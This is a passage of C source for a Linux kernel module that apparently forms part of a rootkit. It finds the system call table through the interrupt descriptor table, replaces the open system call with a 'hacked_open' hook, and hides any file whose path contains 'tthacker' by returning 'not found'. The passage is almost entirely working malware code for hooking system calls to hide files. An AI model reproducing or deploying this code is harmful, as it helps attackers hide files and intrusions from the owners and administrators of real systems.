printk(KERN_ALERT "can't find the address of sys_call_table\n");
return -1;
}
int hacked_open(const char *pathname,int flag,mode_t mode)
{
// char *kernel_pathname;
char *hide="tthacker";
// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);
// memcpy_fromfs(kernel_pathname,pathname,999);
if(strstr(pathname,hide)!=NULL){
printk(KERN_ALERT "find name.\n");
return -ENOENT;
}
else{
// kfree(kernel_pathname);
return orig_open(pathname,flag,mode);
}
}
int init_module(void)
{
__asm__ volatile ("sidt %0": "=m" (idt48));
struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);
base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);
printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);
SYS_CALL_TABLE_ADDR=get_sys_call_table();
sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
orig_open=sys_call_table[__NR_open];
sys_call_table[__NR_open]=hacked_open;
return 0;
}
void cleanup_module()
{
sys_call_table[__NR_open]=orig_open;
}